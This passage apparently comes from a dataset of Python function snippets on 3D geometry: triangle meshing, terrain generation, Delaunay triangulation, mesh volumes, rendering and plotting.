complete.')\n anim.drawNow(ii,q,n)\n return plt.show()", "def _fractal_triangle(self, p1: Point3D, p2: Point3D, p3: Point3D, depth: int):\n if depth == 0:\n height = (p1[1]+p2[1]+p3[1])/3\n if self._only_heightmap:\n self._heightmap[self._get_heightmap_key(p1,p2,p3)] = height\n else:\n if self._color_offset_heightmap is not None:\n height += self._color_offset_heightmap.get_height(p1, p2, p3)\n if height > self._snow_height:\n c = SNOW_COLOR\n elif height < self._tree_height:\n c = TREE_COLOR\n else:\n c = ROCK_COLOR\n self._triangles.append((p1, p2, p3, c))\n else:\n displace = depth <= self._noise_depth\n mid12 = self._get_midpoint(p1, p2, displace)\n mid23 = self._get_midpoint(p2, p3, displace)\n mid13 = self._get_midpoint(p3, p1, displace)\n self._fractal_triangle(p1, mid12, mid13, depth=depth-1)\n self._fractal_triangle(mid12, p2, mid23, depth=depth-1)\n self._fractal_triangle(mid13, mid23, p3, depth=depth-1)\n self._fractal_triangle(mid12, mid23, mid13, depth=depth-1)", "def extract_field_3D(u, grid_start, grid_end, grid_incr, depth):\n lon = np.arange(grid_start, grid_end, grid_incr)\n lat = np.arange(grid_start, grid_end, grid_incr)\n dep = np.arange(0, depth, grid_incr)\n u_field = np.empty([len(lon), len(lat), len(dep), 3])\n for x in range(len(lon)):\n for y in range(len(lat)):\n for z in range(len(dep)):\n try:\n u_field[x, y, z] = u.at([lon[x], lat[y], dep[z]])\n except PointNotInDomainError:\n u_field[x, y, z] = [0, 0, 0]\n return u_field", "def Triangle(self, c1=(0.,0.), c2=(0.,1.), c3=(1.,0.), npoints=10, element_type=\"tri\", equally_spaced=True):\n\n if not isinstance(c1,tuple) or not isinstance(c2,tuple) or not isinstance(c3,tuple):\n raise ValueError(\"The coordinates c1, c2 and c3 should be given in tuples of two elements each (x,y)\")\n\n npoints = int(npoints)\n\n\n npoints = npoints - 1\n if npoints < 0:\n npoints = 0\n\n c1 = np.array(c1); c2 = np.array(c2); c3 = np.array(c3)\n opoints = np.vstack((c1,c2,c3))\n oelements = np.array([[0,1,2]])\n\n if element_type==\"tri\":\n mesh = self.TriangularProjection(points=opoints, npoints=npoints, equally_spaced=equally_spaced)\n self.__update__(mesh)\n\n\n elif element_type == \"quad\":\n\n # SPLIT THE TRIANGLE INTO 3 QUADS\n omesh = Mesh()\n omesh.element_type=\"tri\"\n omesh.elements = oelements\n omesh.nelem = omesh.elements.shape[0]\n omesh.points = opoints\n omesh.GetBoundaryEdges()\n\n sys.stdout = open(os.devnull, \"w\")\n omesh.ConvertTrisToQuads()\n sys.stdout = sys.__stdout__\n\n\n npoints = int(npoints/2) + 1\n mesh = self.QuadrilateralProjection(points=omesh.points[omesh.elements[0,:],:],\n npoints=npoints, equally_spaced=equally_spaced)\n for i in range(1,omesh.nelem):\n mesh += self.QuadrilateralProjection(points=omesh.points[omesh.elements[i,:],:],\n npoints=npoints, equally_spaced=equally_spaced)\n\n self.__update__(mesh)", "def delaunay_triangle_calculation(rect, points):\n # creating the subdiv class\n subdiv = cv2.Subdiv2D(rect)\n\n # Insert points into subdiv class\n for p in points:\n subdiv.insert(p)\n\n triangle_list = subdiv.getTriangleList()\n\n delaunay_tri = []\n pt = []\n\n for t in triangle_list:\n pt.append((t[0], t[1]))\n pt1 = (t[0], t[1])\n\n pt.append((t[2], t[3]))\n pt2 = (t[2], t[3])\n\n pt.append((t[4], t[5]))\n pt3 = (t[4], t[5])\n\n if in_rectangle(rect, pt1) and in_rectangle(rect, pt2) and in_rectangle(rect, pt3):\n ind = []\n # Get face-points (from 68 face detector) by coordinates\n for j in range(0, 3):\n for k in range(0, len(points)):\n if abs(pt[j][0] - points[k][0]) < 1.0 and abs(pt[j][1] - points[k][1]) < 1.0:\n ind.append(k)\n\n if len(ind) == 3:\n delaunay_tri.append((ind[0], ind[1], ind[2]))\n\n pt = []\n\n return delaunay_tri", "def get_curve_3D(eig, alpha=0.25,g23=0.5,g12=0.5): # renumerated according to sato et al: l3 is smallest\n #return sato(eig,alpha,g23, g12)\n return frangi(eig)", "def render(self, scene):\n if self.degenerate:\n return\n # The number of subdivisions around the hoop's radial direction.\n if self.thickness:\n band_coverage = scene.pixel_coverage(self.pos, self.thickness)\n else:\n band_coverage = scene.pixel_coverage(self.pos, self.radius * 0.1)\n if band_coverage < 0:\n band_coverage = 1000\n bands = sqrt(band_coverage * 4.0)\n bands = clamp(4, bands, 40)\n # The number of subdivisions around the hoop's tangential direction.\n ring_coverage = scene.pixel_coverage(self.pos, self.radius)\n if ring_coverage < 0:\n ring_coverage = 1000\n rings = sqrt(ring_coverage * 4.0)\n rings = clamp(4, rings, 80)\n slices = int(rings)\n inner_slices = int(bands)\n radius = self.radius\n inner_radius = self.thickness\n\n # Create the vertex and normal arrays.\n vertices = []\n normals = []\n\n outer_angle_step = 2 * pi / (slices - 1)\n inner_angle_step = 2 * pi / (inner_slices - 1)\n outer_angle = 0.\n for i in range(slices):\n cos_outer_angle = cos(outer_angle)\n sin_outer_angle = sin(outer_angle)\n inner_angle = 0.\n for j in range(inner_slices):\n cos_inner_angle = cos(inner_angle)\n sin_inner_angle = sin(inner_angle)\n\n diameter = (radius + inner_radius * cos_inner_angle)\n vertex_x = diameter * cos_outer_angle\n vertex_y = diameter * sin_outer_angle\n vertex_z = inner_radius * sin_inner_angle\n\n normal_x = cos_outer_angle * cos_inner_angle\n normal_y = sin_outer_angle * cos_inner_angle\n normal_z = sin_inner_angle\n\n vertices.extend([vertex_x, vertex_y, vertex_z])\n normals.extend([normal_x, normal_y, normal_z])\n inner_angle += inner_angle_step\n outer_angle += outer_angle_step\n\n # Create ctypes arrays of the lists\n vertices = (gl.GLfloat *len(vertices))(*vertices)\n normals = (gl.GLfloat * len(normals))(*normals)\n\n # Create a list of triangle indices.\n indices = []\n for i in range(slices - 1):\n for j in range(inner_slices - 1):\n pos = i * inner_slices + j\n indices.extend([pos, pos + inner_slices, pos + inner_slices +\n 1])\n indices.extend([pos, pos + inner_slices + 1, pos + 1])\n indices = (gl.GLuint * len(indices))(*indices)\n\n # Compile a display list\n self.list = gl.glGenLists(1)\n gl.glNewList(self.list, gl.GL_COMPILE)\n self.color.gl_set(self.opacity)\n\n gl.glPushClientAttrib(gl.GL_CLIENT_VERTEX_ARRAY_BIT)\n gl.glEnableClientState(gl.GL_VERTEX_ARRAY)\n gl.glEnableClientState(gl.GL_NORMAL_ARRAY)\n self.model_world_transform(scene.gcf,\n Vector([self.radius, self.radius,\n self.radius])).gl_mult()\n\n gl.glVertexPointer(3, gl.GL_FLOAT, 0, vertices)\n gl.glNormalPointer(gl.GL_FLOAT, 0, normals)\n gl.glDrawElements(gl.GL_TRIANGLES, len(indices), gl.GL_UNSIGNED_INT,\n indices)\n gl.glPopClientAttrib()\n\n gl.glEndList()\n gl.glCallList(self.list)", "def is3_d(self):\n return self.container['is3_d']", "def parse_triangle(keyword_args, lineno=None):\n if keyword_args.get(\"text\") is None:\n keyword_args['text'] = \"triangle \" + keyword_args[\"name\"]\n keyword_args['type'] = \"polygon\"\n return parse_polygon(keyword_args, lineno=lineno)", "def mesh_preprocess(ver, tri):\n\n # TODO: Remove the type transform. Technically it does nothing\n ver_ravel = ver.ravel().astype('float32')\n tri_ravel = tri.ravel().astype('int32')\n n_vtx_coord = ver_ravel.shape[0]\n n_triangles = tri_ravel.shape[0]\n return ver_ravel, tri_ravel, n_vtx_coord, n_triangles", "def read_geometry(filepath, read_metadata=False, read_stamp=False):\n volume_info = OrderedDict()\n\n TRIANGLE_MAGIC = 16777214\n\n with open(filepath, \"rb\") as fobj:\n magic = _fread3(fobj)\n\n if magic == TRIANGLE_MAGIC: # Triangle file\n create_stamp = fobj.readline().rstrip(b'\\n').decode('utf-8')\n test_dev = fobj.peek(1)[:1]\n if test_dev == b'\\n':\n fobj.readline()\n vnum = np.fromfile(fobj, \">i4\", 1)[0]\n fnum = np.fromfile(fobj, \">i4\", 1)[0]\n coords = np.fromfile(fobj, \">f4\", vnum * 3).reshape(vnum, 3)\n faces = np.fromfile(fobj, \">i4\", fnum * 3).reshape(fnum, 3)\n\n if read_metadata:\n volume_info = _read_volume_info(fobj)\n else:\n raise ValueError(\"File does not appear to be a Freesurfer surface (triangle file)\")\n\n coords = coords.astype(np.float) # XXX: due to mayavi bug on mac 32bits\n\n ret = (coords, faces)\n if read_metadata:\n if len(volume_info) == 0:\n warnings.warn('No volume information contained in the file')\n ret += (volume_info,)\n if read_stamp:\n ret += (create_stamp,)\n\n return ret", "def get_mesh(self):\n tsdf_vol, color_vol = self.get_volume()\n\n # Marching cubes\n verts, faces, norms, vals = measure.marching_cubes_lewiner(tsdf_vol, level=0)\n verts_ind = np.round(verts).astype(int)\n verts = verts * self._voxel_size + self._vol_origin # voxel grid coordinates to world coordinates\n\n # Get vertex colors\n rgb_vals = color_vol[verts_ind[:, 0], verts_ind[:, 1], verts_ind[:, 2]]\n colors_b = np.floor(rgb_vals / self._color_const)\n colors_g = np.floor((rgb_vals - colors_b * self._color_const) / 256)\n colors_r = rgb_vals - colors_b * self._color_const - colors_g * 256\n colors = np.floor(np.asarray([colors_r, colors_g, colors_b])).T\n colors = colors.astype(np.uint8)\n return verts, faces, norms, colors", "def get_grid_mesh_volume(xs, ys, zs, vol_shape, s=1, include_borderline=True):\n\n xs, ys, zs = get_grid_mesh_coordinates(**locals())\n\n xdim, ydim, zdim = vol_shape\n vol = np.zeros((ydim, xdim, zdim), np.bool)\n xs = xs.astype(np.int)\n ys = ys.astype(np.int)\n zs = zs.astype(np.int)\n xs = xs[(xs >= 0) & (xs < xdim)]\n ys = ys[(ys >= 0) & (ys < ydim)]\n zs = zs[(zs >= 0) & (zs < zdim)]\n if include_borderline:\n if 0 not in xs:\n xs = np.r_[0, xs, xdim-1]\n else:\n xs = np.r_[xs, xdim-1]\n if 0 not in ys:\n ys = np.r_[0, ys, ydim-1]\n else:\n ys = np.r_[ys, ydim-1]\n if 0 not in zs:\n zs = np.r_[0, zs, zdim-1]\n else:\n zs = np.r_[zs, zdim-1]\n for y in ys:\n vol[y, xs, ::s] = 1\n vol[y, ::s, zs] = 1\n for x in xs:\n vol[ys, x, ::s] = 1\n vol[::s, x, zs] = 1\n for z in zs:\n vol[ys, ::s, z] = 1\n vol[::s, xs, z] = 1\n\n return vol", "def is3D(data):\n return data.find(\"x3\") != -1 and data.find(\"y3\") != -1 and data.find(\"z3\") != -1", "def gouraud_triangles(triangle_strip, vertex_vals, shape):\n triangle_strip = numpy.asarray(triangle_strip)\n vertex_vals = numpy.asarray(vertex_vals)\n assert triangle_strip.ndim == 2 and triangle_strip.shape[1] == 2 and len(triangle_strip) > 2\n unpack_out = False\n if vertex_vals.ndim == 1:\n vertex_vals = vertex_vals[:, numpy.newaxis]\n unpack_out = True\n assert len(vertex_vals) == len(triangle_strip)\n grid = numpy.indices(shape) + 0.5 # pixel centers are at (0.5, 0.5 geometrically)\n outputs = [numpy.zeros(shape) for i in range(vertex_vals.shape[1])]\n mask = numpy.zeros(shape, dtype=bool)\n for i in range(len(triangle_strip) - 2):\n vertices = triangle_strip[i:i+3]\n vals = vertex_vals[i:i+3]\n xmn, ymn = numpy.floor(vertices.min(axis=0)).astype(int)\n xmx, ymx = numpy.ceil(vertices.max(axis=0)).astype(int) + 1\n xs, ys = slice(xmn, xmx), slice(ymn, ymx)\n b_coords = barycentric_coords(vertices, grid[:, xs, ys])\n m = (b_coords >= 0).all(axis=0)\n mask[xs, ys] |= m\n b_m = b_coords[:, m]\n for j, out in enumerate(outputs):\n out[xs, ys][m] = vals[:, j].dot(b_m)\n if unpack_out:\n outputs = outputs[0]\n return mask, outputs", "def imshow_mesh_3d(img, vertices, faces, camera_center, focal_length, colors=(76, 76, 204)):\n H, W, C = img.shape\n if not has_pyrender:\n warnings.warn('pyrender package is not installed.')\n return img\n if not has_trimesh:\n warnings.warn('trimesh package is not installed.')\n return img\n try:\n renderer = pyrender.OffscreenRenderer(viewport_width=W, viewport_height=H)\n except (ImportError, RuntimeError):\n warnings.warn('pyrender package is not installed correctly.')\n return img\n if not isinstance(colors, list):\n colors = [colors for _ in range(len(vertices))]\n colors = [color_val(c) for c in colors]\n depth_map = np.ones([H, W]) * np.inf\n output_img = img\n for idx in range(len(vertices)):\n color = colors[idx]\n color = [(c / 255.0) for c in color]\n color.append(1.0)\n vert = vertices[idx]\n face = faces[idx]\n material = pyrender.MetallicRoughnessMaterial(metallicFactor=0.2, alphaMode='OPAQUE', baseColorFactor=color)\n mesh = trimesh.Trimesh(vert, face)\n rot = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])\n mesh.apply_transform(rot)\n mesh = pyrender.Mesh.from_trimesh(mesh, material=material)\n scene = pyrender.Scene(ambient_light=(0.5, 0.5, 0.5))\n scene.add(mesh, 'mesh')\n camera_pose = np.eye(4)\n camera = pyrender.IntrinsicsCamera(fx=focal_length[0], fy=focal_length[1], cx=camera_center[0], cy=camera_center[1], zfar=100000.0)\n scene.add(camera, pose=camera_pose)\n light = pyrender.DirectionalLight(color=[1.0, 1.0, 1.0], intensity=1)\n light_pose = np.eye(4)\n light_pose[:3, 3] = np.array([0, -1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([0, 1, 1])\n scene.add(light, pose=light_pose)\n light_pose[:3, 3] = np.array([1, 1, 2])\n scene.add(light, pose=light_pose)\n color, rend_depth = renderer.render(scene, flags=pyrender.RenderFlags.RGBA)\n valid_mask = (rend_depth < depth_map) * (rend_depth > 0)\n depth_map[valid_mask] = rend_depth[valid_mask]\n valid_mask = valid_mask[:, :, None]\n output_img = valid_mask * color[:, :, :3] + (1 - valid_mask) * output_img\n return output_img", "def surface(self):\n # return sum(np.outer(basis_function, control_point) for basis_function, control_point in zip(self.basis_1, self.basis)).T\n # return sum(np.outer(basis_function_1, self.control_net[ii, jj]) for ((ii, basis_function_1), (jj, basis_function_2)) in zip(enumerate(self.basis_1), enumerate(self.basis_2))).T\n # return sum(np.outer(basis_function_1, self.control_net[ii, jj]) + np.outer(basis_function_2, self.control_net[ii, jj]) for ((ii, basis_function_1), (jj, basis_function_2)) in zip(enumerate(self.basis_1), enumerate(self.basis_2))).T\n\n # x = np.zeros_like(self.xi_1_mesh)\n # y = np.zeros_like(self.xi_1_mesh)\n # z = np.zeros_like(self.xi_1_mesh)\n xyz = np.zeros((*self.xi_1_mesh.shape, 3))\n for (i, basis_function_i), (j, basis_function_j) in itertools.product(enumerate(self.basis_1), enumerate(self.basis_2)):\n print(i, basis_function_i)\n print(j, basis_function_j)\n print(self.control_net[i, j])\n # b1, b2 = np.meshgrid(basis_function_i, basis_function_j, indexing = 'ij')\n control_x, control_y, control_z = self.control_net[i, j]\n # print(b1.shape, b2.shape, np.array(self.control_net[i, j]).shape)\n # print((b1 * b2).shape)\n # z += np.outer(b1 * b2, self.control_net[i, j])\n # print(np.shape(z))\n print(np.outer(basis_function_i, basis_function_j))\n # x += np.outer(basis_function_i, basis_function_j) * control_x\n # y += np.outer(basis_function_i, basis_function_j) * control_y\n # z += np.outer(basis_function_i, basis_function_j) * control_z\n print(np.outer(basis_function_i, basis_function_j).shape)\n print(np.outer(np.outer(basis_function_i, basis_function_j), self.control_net[i, j]).shape)\n print(np.outer(np.outer(basis_function_i, basis_function_j), np.array(self.control_net[i, j])).shape)\n r = np.einsum('i,j,k->ijk', basis_function_i, basis_function_j, np.array(self.control_net[i, j]))\n print(r.shape)\n xyz += r\n\n # print(x, y, z)\n\n # return x, y, z\n return xyz", "def MeshPyTri(points,facets,*args,**kwargs):\n info = triangle.MeshInfo()\n info.set_points(points)\n info.set_facets(facets)\n\n return triangle.build(info,*args,**kwargs)", "def signed_tetrahedral_volume(p1, p2, p3):\n v321 = p3[..., 0] * p2[..., 1] * p1[..., 2]\n v231 = p2[..., 0] * p3[..., 1] * p1[..., 2]\n v312 = p3[..., 0] * p1[..., 1] * p2[..., 2]\n v132 = p1[..., 0] * p3[..., 1] * p2[..., 2]\n v213 = p2[..., 0] * p1[..., 1] * p3[..., 2]\n v123 = p1[..., 0] * p2[..., 1] * p3[..., 2]\n return (-v321 + v231 + v312 - v132 - v213 + v123) / 6.", "def get_grid_point_volume(xs, ys, zs, vol_shape, return_nz=False):\n\n xdim, ydim, zdim = vol_shape\n vol = np.zeros((ydim, xdim, zdim), np.bool)\n xs = xs.astype(np.int)\n ys = ys.astype(np.int)\n zs = zs.astype(np.int)\n xs = xs[(xs >= 0) & (xs < xdim)]\n ys = ys[(ys >= 0) & (ys < ydim)]\n zs = zs[(zs >= 0) & (zs < zdim)]\n gp_xs, gp_ys, gp_zs = np.meshgrid(xs, ys, zs, indexing='ij')\n gp_xyzs = np.c_[gp_xs.flatten(), gp_ys.flatten(), gp_zs.flatten()]\n vol[gp_xyzs[:,1], gp_xyzs[:,0], gp_xyzs[:,2]] = 1\n\n if return_nz:\n return vol, gp_xyzs\n else:\n return vol", "def boundary_triangles(TRI, boundary):\n # Look for triangles in TRI that contain 2 elements on the boundary\n # (ie they have a boundary edge in the triangle)\n inb0 = np.where(np.in1d(TRI[:, 0], boundary))[0]\n inb1 = np.where(np.in1d(TRI[:, 1], boundary))[0]\n inb2 = np.where(np.in1d(TRI[:, 2], boundary))[0]\n inb_all = np.hstack((inb0, inb1, inb2)).ravel()\n # print 'inb_all = ', inb_all\n\n # Look for indices that appear twice in cat( inb0,inb1,inb2).\n s = np.sort(inb_all, axis=None)\n btris = s[s[1:] == s[:-1]]\n\n # If any values are repeated in btri, that means all three vertices are boundary.\n # Keep these. Also, remove from the list any tris that share two points with one of these tris.\n # --> this is because this means an edge (not a boundary edge) connects two boundary particles,\n # and cuts off another particle.\n btri_repeats = btris[btris[1:] == btris[:-1]]\n # print 'TRI = ', TRI\n # print 'btris = ', btris\n # print 'btri_repeats = ', btri_repeats\n\n # btri = np.setdiff1d(btris,btri_repeats)\n btris = np.unique(btris)\n\n # If any btri triangles share an edge with a btri_repeats (they share 2 points),\n # kill the btri triangle.\n mask = np.ones(len(btris), dtype=bool)\n for ii in range(len(btris)):\n # if this one isn't itself a repeat, check against all brtri_repeats\n if not np.in1d(btris[ii], btri_repeats):\n tri0 = TRI[btris[ii]]\n for btr in btri_repeats:\n tri1 = TRI[btr]\n if len(np.intersect1d(tri0, tri1, assume_unique=True)) > 1:\n # print 'matching = ', np.intersect1d(tri0,tri1,assume_unique=True)\n mask[ii] = False\n btri = btris[mask]\n\n return btri", "def dim3():\n return Integer(\"yolo3\", \"uniform\", 3, 7, shape=(1,))", "def display_facet(model_name, vertices, faces, plot_type, display_normals=False, scale=0.2):\n # Separate the coordinates of the vertices\n x = vertices[:, 0]\n y = vertices[:, 1]\n z = vertices[:, 2]\n\n # Display the model\n ax = Axes3D(plt.figure())\n if plot_type == 'Facet':\n ax.plot_trisurf(x, y, z, triangles=faces, color=(1, 1, 1, 1), edgecolor='gray')\n elif plot_type == 'Wireframe':\n ax.plot_trisurf(x, y, z, triangles=faces, color='none', edgecolor='black')\n ax.grid(True)\n set_equal(ax)\n\n ax.set_title(model_name, size='14')\n ax.set_xlabel('X', size='12')\n ax.set_ylabel('Y', size='12')\n ax.set_zlabel('Z', size='12')\n\n # Set the tick label size\n ax.tick_params(labelsize=12)\n\n if display_normals:\n\n # Vector from origin to vertices\n r = zeros([vertices.shape[0], 3])\n\n for i in range(vertices.shape[0]):\n r[i] = [vertices[i][0], vertices[i][1], vertices[i][2]]\n\n for i in range(faces.shape[0]):\n a = r[faces[i][1]] - r[faces[i][0]]\n b = r[faces[i][2]] - r[faces[i][1]]\n\n # Outward normal\n normal = cross(a, b) + 0.\n\n # Scale the size of the arrow to be displayed\n normal *= scale\n\n # Put the arrow at the center of the facet\n mean_r = (r[faces[i][0]] + r[faces[i][1]] + r[faces[i][2]]) / 3.0\n\n # Get the arrow for the normal\n arrow = Arrow3D([mean_r[0], mean_r[0] + normal[0]], [mean_r[1], mean_r[1] + normal[1]],\n [mean_r[2], mean_r[2] + normal[2]], mutation_scale=10, lw=1, arrowstyle=\"-|>\", color=\"r\")\n ax.add_artist(arrow)\n\n plt.show()", "def importWells3D(BD_prlvm,grid,lst_domain,fac=1/365/86400,V_col=\"V Bancaris\",geol_col=\"NAPPE_CAPT\",\n geol_layer=[\"PLIOCENE\",\"QUATERNAIRE\"],layer_num=[1,0]):\n \n ix=GridIntersect(grid)\n stress_data_well=[]\n \n for ilayer in range(len(geol_layer)): # iterate through layers\n BD = BD_prlvm[BD_prlvm[geol_col] == geol_layer[ilayer]] # only keep layers with the right geol\n for o in BD.index: #iterate through each well\n Vw = BD.loc[o,V_col]\n if not (np.isnan(Vw)) | (Vw == 0): #keep productive well\n cellidx = ix.intersect(BD.geometry[o]).cellids[0][0]\n cellidy = ix.intersect(BD.geometry[o]).cellids[0][1]\n \n if type(layer_num[ilayer]) == int :\n cellid = (layer_num[ilayer],cellidx,cellidy) #cell on which the well is active\n if cellid in lst_domain: # check if the well is in the domain\n stress_data_well.append((cellid,-fac*Vw))\n elif len(layer_num[ilayer]) > 1:\n cpt=0\n for isublay in layer_num[ilayer]:\n cellid = (isublay,cellidx,cellidy)\n\n if cellid in lst_domain:\n cpt+=1\n for isublay in layer_num[ilayer]: \n cellid = (isublay,cellidx,cellidy)\n if cellid in lst_domain: # check if the well is in the domain\n stress_data_well.append((cellid,-fac*Vw/cpt))\n \n return stress_data_well", "def get_quad_mesh(q, dx):\n P0, P1, P2, P3 = q\n p0 = Vector.fromPoint(P0) # fromPoint converts to ECEF\n p1 = Vector.fromPoint(P1)\n p2 = Vector.fromPoint(P2)\n p3 = Vector.fromPoint(P3)\n\n # Get nx based on length of top edge, minimum allowed is 2\n toplen_km = get_quad_length(q)\n nx = int(np.max([round(toplen_km / dx, 0) + 1, 2]))\n\n # Get array of points along top and bottom edges\n xfac = np.linspace(0, 1, nx)\n topp = [p0 + (p1 - p0) * a for a in xfac]\n botp = [p3 + (p2 - p3) * a for a in xfac]\n\n # Get ny based on mean length of vectors connecting top and bottom points\n ylen_km = np.ones(nx)\n for i in range(nx):\n ylen_km[i] = (topp[i] - botp[i]).mag() / 1000\n ny = int(np.max([round(np.mean(ylen_km) / dx, 0) + 1, 2]))\n yfac = np.linspace(0, 1, ny)\n\n # Build mesh: dict of ny by nx arrays (x, y, z):\n mesh = {'x': np.zeros([ny, nx]), 'y': np.zeros(\n [ny, nx]), 'z': np.zeros([ny, nx])}\n for i in range(nx):\n mpts = [topp[i] + (botp[i] - topp[i]) * a for a in yfac]\n mesh['x'][:, i] = [a.x for a in mpts]\n mesh['y'][:, i] = [a.y for a in mpts]\n mesh['z'][:, i] = [a.z for a in mpts]\n\n # Make arrays of pixel corners\n mesh['llx'] = mesh['x'][1:, 0:-1]\n mesh['lrx'] = mesh['x'][1:, 1:]\n mesh['ulx'] = mesh['x'][0:-1, 0:-1]\n mesh['urx'] = mesh['x'][0:-1, 1:]\n mesh['lly'] = mesh['y'][1:, 0:-1]\n mesh['lry'] = mesh['y'][1:, 1:]\n mesh['uly'] = mesh['y'][0:-1, 0:-1]\n mesh['ury'] = mesh['y'][0:-1, 1:]\n mesh['llz'] = mesh['z'][1:, 0:-1]\n mesh['lrz'] = mesh['z'][1:, 1:]\n mesh['ulz'] = mesh['z'][0:-1, 0:-1]\n mesh['urz'] = mesh['z'][0:-1, 1:]\n mesh['cpx'] = np.zeros_like(mesh['llx'])\n mesh['cpy'] = np.zeros_like(mesh['llx'])\n mesh['cpz'] = np.zeros_like(mesh['llx'])\n\n # i and j are indices over subruptures\n ni, nj = mesh['llx'].shape\n for i in range(0, ni):\n for j in range(0, nj):\n # Rupture corner points\n pp0 = Vector(\n mesh['ulx'][i, j], mesh['uly'][i, j], mesh['ulz'][i, j])\n pp1 = Vector(\n mesh['urx'][i, j], mesh['ury'][i, j], mesh['urz'][i, j])\n pp2 = Vector(\n mesh['lrx'][i, j], mesh['lry'][i, j], mesh['lrz'][i, j])\n pp3 = Vector(\n mesh['llx'][i, j], mesh['lly'][i, j], mesh['llz'][i, j])\n # Find center of quad\n mp0 = pp0 + (pp1 - pp0) * 0.5\n mp1 = pp3 + (pp2 - pp3) * 0.5\n cp = mp0 + (mp1 - mp0) * 0.5\n mesh['cpx'][i, j] = cp.x\n mesh['cpy'][i, j] = cp.y\n mesh['cpz'][i, j] = cp.z\n return mesh", "def CreateSurface2DMeshfrom3DMesh(self):\n\n self.__do_memebers_exist__()\n\n p = self.InferPolynomialDegree()\n mm = Mesh()\n if self.element_type == \"hex\":\n mm.element_type = \"quad\"\n elif self.element_type == \"tet\":\n mm.element_type = \"tri\"\n else:\n raise ValueError(\"Cannot make a 2D mesh from the 3D mesh of type {}\".format(self.element_type))\n\n unique_faces, inv_faces = np.unique(self.faces,return_inverse=True)\n mm.points = self.points[unique_faces,:]\n mm.nnode = mm.points.shape[0]\n aranger = np.arange(mm.nnode)\n mm.elements = aranger[inv_faces].reshape(self.faces.shape)\n mm.nelem = mm.elements.shape[0]\n mm.GetBoundaryEdges()\n\n return mm", "def volume_polyhedron(polyhedron):\n V = 0\n for fkey in polyhedron.face:\n vertices = polyhedron.face_vertices(fkey, ordered=True)\n if len(vertices) == 3:\n faces = [vertices]\n else:\n faces = []\n for i in range(1, len(vertices) - 1):\n faces.append(vertices[0:1] + vertices[i:i + 2])\n for face in faces:\n a = polyhedron.vertex_coordinates(face[0])\n b = polyhedron.vertex_coordinates(face[1])\n c = polyhedron.vertex_coordinates(face[2])\n ab = subtract_vectors(b, a)\n ac = subtract_vectors(c, a)\n n = cross_vectors(ab, ac)\n V += dot_vectors(a, n)\n return V / 6.", "def plot3d(data_x, data_y, data_z, vol):\n fig = go.Figure(\n data = [\n go.Mesh3d(\n x = data_x,\n y = data_y,\n z = data_z,\n i = [7, 0, 0, 0, 4, 4, 6, 6, 4, 0, 3, 2], # These are needed, numbers from documentation\n j = [3, 4, 1, 2, 5, 6, 5, 2, 0, 1, 6, 3],\n k = [0, 7, 2, 3, 6, 7, 1, 1, 5, 5, 7, 6],\n colorscale=[[0, 'darkblue'],\n [0.5, 'lightskyblue'],\n [1, 'darkblue']],\n intensity = np.linspace(0, 1, 8, endpoint=True),\n showscale=False,\n opacity = 0.6\n )\n ],\n layout = go.Layout(\n title = \"Le volume est: \" + str(vol),\n autosize = True\n )\n )\n\n # This prints it\n pyo.iplot(fig, filename='Determinant-Volume')", "def get3d(infile, histname, subdir='',verbose=False): \n\n ## 2d Histogram\n Hist = getter(infile,histname,subdir,verbose)\n\n nbinsX, nbinsY, nbinsZ = Hist.GetNbinsX(), Hist.GetNbinsY(), Hist.GetNbinsZ()\n Arr = np.zeros((nbinsZ,nbinsY,nbinsX))\n dArr = np.zeros((nbinsZ,nbinsY,nbinsX))\n axesX = np.zeros(nbinsX)\n axesY = np.zeros(nbinsY)\n axesZ = np.zeros(nbinsZ)\n edgesX = np.zeros(nbinsX+1)\n edgesY = np.zeros(nbinsY+1)\n edgesZ = np.zeros(nbinsZ+1)\n for j in xrange(0,nbinsX):\n axesX[j] = Hist.GetXaxis().GetBinCenter(j+1)\n edgesX[j] = Hist.GetXaxis().GetBinLowEdge(j+1)\n edgesX[nbinsX] = Hist.GetXaxis().GetBinLowEdge(nbinsX+1)\n\n for j in xrange(0,nbinsY):\n axesY[j] = Hist.GetYaxis().GetBinCenter(j+1)\n edgesY[j] = Hist.GetYaxis().GetBinLowEdge(j+1)\n edgesY[nbinsY] = Hist.GetYaxis().GetBinLowEdge(nbinsY+1)\n\n for j in xrange(0,nbinsZ):\n axesZ[j] = Hist.GetZaxis().GetBinCenter(j+1)\n edgesZ[j] = Hist.GetZaxis().GetBinLowEdge(j+1)\n edgesZ[nbinsZ] = Hist.GetZaxis().GetBinLowEdge(nbinsZ+1)\n\n axes = [axesX, axesY, axesZ]\n edges = [edgesX, edgesY, edgesZ]\n \n for j in xrange(0,nbinsX):\n for k in xrange(0,nbinsY):\n for l in xrange(0,nbinsZ):\n Arr[l,k,j] = Hist.GetBinContent(j+1,k+1,l+1)\n dArr[l,k,j] = Hist.GetBinError(j+1,k+1,l+1)\n \n return axes, edges, Arr, dArr", "def subdivision(mesh):\n\t\n\t\n\t# 1. generate new nodes in the centre of quad\n\t# 1/4 o-------o 1/4 o: existing vertices\n\t# | | *: newly-generated vertices\n\t# | * |\n\t# | |\n\t# 1/4 o-------o 1/4\n\n\tnew_coor = mesh.give_nodes().give_coor()\n\t\n\tfor face_index in range(mesh.give_model_inf()[2]): \n\t\tnew_x, new_y, new_z = (0, 0, 0)\n\t\tfor vertex_index in range(4):\n\t\t\tmesh.give_faces()\n\t\t\tnode_index = mesh.give_faces().give_node_list(face_index)[vertex_index]\n\n\t\t\tnew_x += 0.25*mesh.give_nodes().give_coor(node_index)[0]\n\t\t\tnew_y += 0.25*mesh.give_nodes().give_coor(node_index)[1]\n\t\t\tnew_z += 0.25*mesh.give_nodes().give_coor(node_index)[2]\n\t\t\t\n\t\tnew_coor.append((new_x, new_y, new_z))\n\t\t\n\t# generating new nodes on the edge\n\t# figure out one edge is shared by how many surfaces\n\tedge_shared_by_faces_list = helper.find_edge_shared_by_which_faces(mesh.give_edges(), mesh.give_faces())\n\t\n\tfor edge_index in range(mesh.give_model_inf()[1]):\n\n\t\tnew_x, new_y, new_z = (0., 0., 0.)\n\t\t\n\t# 2. generate new node on boundary edge\n\t# o: existing vertices\n\t# 1/2 o---*---o 1/2 *: newly-generated vertices\n\t# \n\n\t\tnew_coor = mesh.give_nodes().give_coor()\n\t\tif len(edge_shared_by_faces_list[edge_index]) == 1:\t\n\t\t\tnew_x, new_y, new_z = (0., 0., 0.)\n\t\t\tfor vertex_index in range(2):\n\t\t\t\tthis_node = 